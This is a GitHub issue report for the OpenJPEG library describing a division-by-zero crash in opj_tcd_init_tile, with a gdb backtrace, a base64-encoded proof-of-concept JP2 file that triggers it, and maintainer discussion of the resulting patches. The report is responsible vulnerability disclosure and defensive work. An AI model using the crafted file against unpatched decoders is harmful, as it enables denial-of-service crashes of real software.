Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

division-by-zero (SIGFPE) error in opj_tcd_init_tile function (line 730 of tcd.c) #733

Closed
trylab opened this issue Mar 28, 2016 · 5 comments

Comments

Projects
None yet
3 participants
@trylab
Copy link
Contributor

commented Mar 28, 2016


Testing Environment

Ubuntu + OpenJPEG (GitHub master, 2016/03/28)


Exception Information

username@ubuntu:~/Desktop/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...done.
(gdb) r -o image.pgm -i crashes/001.jp2
Starting program: ~/Desktop/openjpeg/bin/opj_decompress -o image.pgm -i crashes/001.jp2

[INFO] Start to read j2k main header (131).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image

Program received signal SIGFPE, Arithmetic exception.
0xb7fc446d in opj_tcd_init_tile (p_tcd=0x8062850, p_tile_no=0, isEncoder=0,
fraction=0.5, sizeof_block=56, manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:730
730 if ((((OPJ_UINT32)-1) / l_data_size) < (OPJ_UINT32)(l_tilec->y1 - l_tilec->y0)) {

(gdb) p l_data_size
$1 = 0

(gdb) bt
#0 0xb7fc446d in opj_tcd_init_tile (p_tcd=0x8062850, p_tile_no=0, isEncoder=0,

                                 fraction=0.5, sizeof_block=56, manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:730

#1 0xb7fc571b in opj_tcd_init_decode_tile (p_tcd=0x8062850, p_tile_no=0,

                                        p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:1043

#2 0xb7fa80be in opj_j2k_read_tile_header (p_j2k=0x8060298, p_tile_index=0xbfff9e84,

                                        p_data_size=0xbfff9e88, p_tile_x0=0xbfff9e8c, 
                                        p_tile_y0=0xbfff9e90, p_tile_x1=0xbfff9e94, 
                                        p_tile_y1=0xbfff9e98, p_nb_comps=0xbfff9e9c, 
                                        p_go_on=0xbfff9e80, p_stream=0x8060170, 
                                        p_manager=0x80601e4) 
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:8076

#3 0xb7fac298 in opj_j2k_decode_tiles (p_j2k=0x8060298, p_stream=0x8060170,

                                    p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:9717

#4 0xb7fa661e in opj_j2k_exec (p_j2k=0x8060298, p_procedure_list=0x8062420,

                            p_stream=0x8060170, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:7341

#5 0xb7facaf9 in opj_j2k_decode (p_j2k=0x8060298, p_stream=0x8060170,

                              p_image=0x8062890, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:9943

#6 0xb7fb1aad in opj_jp2_decode (jp2=0x8060210, p_stream=0x8060170,

                              p_image=0x8062890, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/jp2.c:1487

#7 0xb7fb6c79 in opj_decode (p_codec=0x80601b8, p_stream=0x8060170, p_image=0x8062890)

at ~/Desktop/openjpeg/src/lib/openjp2/openjpeg.c:412

#8 0x0804c2c0 in main (argc=5, argv=0xbffff124)

at ~/Desktop/openjpeg/src/bin/jp2/opj_decompress.c:1330

Simple Analysis

The value of l_data_size is zero.
The code ((OPJ_UINT32)-1)/l_data_size will cause a divide-by-zero exception (SIGFPE).


Proof-of-Concept file

Please decode the following content with base64 algorithm.
Then you should save the decoded content to a jp2 file to generate the PoC.

AAAADGpQICANCocKAAAAFGZ0eXBqcEEgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA
BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABAAAAAiY2RlZgAEAAAAAAABpAEAAAACAAIA
AAADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAFAAAAAAAAAAgAAAAIAAAAAAAAAAA
AAQEAQEEIAEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy
ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch
8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO
HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA
9VfWofCMnawpQPlngP/Z


Credit

This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.

stweil added a commit to stweil/openjpeg that referenced this issue Mar 28, 2016

Support files with very large data size
The maximum supported data size is a limiting factor for the maximum
size of allowed images. As it is possible to allocate size_t bytes,
this data type must also be used for the data size.

This modification also fixes issue uclouvain#432. That file is now decoded on
64 bit hosts with enough RAM, so the regression test had to be fixed.
Until it is possible to use different test cases for 32 and 64 bit hosts,
the test for issue uclouvain#432 is disabled.

Handle also a potential division by zero when l_data_size is 0.
This fixes issue uclouvain#733.

Update also some comments in the test suite.

Signed-off-by: Stefan Weil <sw@weilnetz.de>
@stweil

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2016

The decoded jp2 file is available in this zip archive: test.zip. I added code to PR #730 which handles the division by zero error.

@trylab

This comment has been minimized.

Copy link
Contributor Author

commented Mar 28, 2016

@stweil Thanks for your patch. It works fine.

@stweil

This comment has been minimized.

Copy link
Contributor

commented May 8, 2016

@mayeut, did you have a look at my PR #730 which also fixed the division by zero but in a different way? With your patch, l_data_size == 0 won't stop processing.

@mayeut

This comment has been minimized.

Copy link
Collaborator

commented May 8, 2016

@stweil, I saw what you did in your PR. I'd rather merge only one change. Now, regarding this specific check, it'll stop processing with "allocation failed" (malloc(0) = NULL). I don't know if Zero size tile data is legal or not (e.g. border tile with subsample components might lead to zero size tile => is that legal ?). Maybe @detonin can shed some light on this. If it's legal, I'd stick with what I just merged. If it's not legal, then your approach would be better.

@stweil

This comment has been minimized.

Copy link
Contributor

commented May 8, 2016

Just tell me when you need a separate PR for the l_data_size == 0 case. I can split PR #730 of course.

stweil added a commit to stweil/openjpeg that referenced this issue May 8, 2016

Support files with very large data size
The maximum supported data size is a limiting factor for the maximum
size of allowed images. As it is possible to allocate size_t bytes,
this data type must also be used for the data size.

This modification also fixes issue uclouvain#432. That file is now decoded on
64 bit hosts with enough RAM, so the regression test had to be fixed.
Until it is possible to use different test cases for 32 and 64 bit hosts,
the test for issue uclouvain#432 is disabled.

Handle also a potential division by zero when l_data_size is 0.
This fixes issue uclouvain#733.

Update also some comments in the test suite.

Signed-off-by: Stefan Weil <sw@weilnetz.de>

mayeut added a commit to mayeut/openjpeg that referenced this issue May 8, 2016

stweil added a commit to stweil/openjpeg that referenced this issue May 3, 2017

Support files with very large data size
The maximum supported data size is a limiting factor for the maximum
size of allowed images. As it is possible to allocate size_t bytes,
this data type must also be used for the data size.

This modification also fixes issue uclouvain#432. That file is now decoded on
64 bit hosts with enough RAM, so the regression test had to be fixed.
Until it is possible to use different test cases for 32 and 64 bit hosts,
the test for issue uclouvain#432 is disabled.

Handle also a potential division by zero when l_data_size is 0.
This fixes issue uclouvain#733.

Update also some comments in the test suite.

Signed-off-by: Stefan Weil <sw@weilnetz.de>

stweil added a commit to stweil/openjpeg that referenced this issue Aug 12, 2017

Support files with very large data size
The maximum supported data size is a limiting factor for the maximum
size of allowed images. As it is possible to allocate size_t bytes,
this data type must also be used for the data size.

This modification also fixes issue uclouvain#432. That file is now decoded on
64 bit hosts with enough RAM, so the regression test had to be fixed.
Until it is possible to use different test cases for 32 and 64 bit hosts,
the test for issue uclouvain#432 is disabled.

Handle also a potential division by zero when l_data_size is 0.
This fixes issue uclouvain#733.

Update also some comments in the test suite.

Signed-off-by: Stefan Weil <sw@weilnetz.de>

stweil added a commit to stweil/openjpeg that referenced this issue Aug 24, 2017

Support files with very large data size
The maximum supported data size is a limiting factor for the maximum
size of allowed images. As it is possible to allocate size_t bytes,
this data type must also be used for the data size.

This modification also fixes issue uclouvain#432. That file is now decoded on
64 bit hosts with enough RAM, so the regression test had to be fixed.
Until it is possible to use different test cases for 32 and 64 bit hosts,
the test for issue uclouvain#432 is disabled.

Handle also a potential division by zero when l_data_size is 0.
This fixes issue uclouvain#733.

Update also some comments in the test suite.

Signed-off-by: Stefan Weil <sw@weilnetz.de>

stweil added a commit to stweil/openjpeg that referenced this issue Sep 8, 2017

Support files with very large data size
The maximum supported data size is a limiting factor for the maximum
size of allowed images. As it is possible to allocate size_t bytes,
this data type must also be used for the data size.

This modification also fixes issue uclouvain#432. That file is now decoded on
64 bit hosts with enough RAM, so the regression test had to be fixed.
Until it is possible to use different test cases for 32 and 64 bit hosts,
the test for issue uclouvain#432 is disabled.

Handle also a potential division by zero when l_data_size is 0.
This fixes issue uclouvain#733.

Update also some comments in the test suite.

Signed-off-by: Stefan Weil <sw@weilnetz.de>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.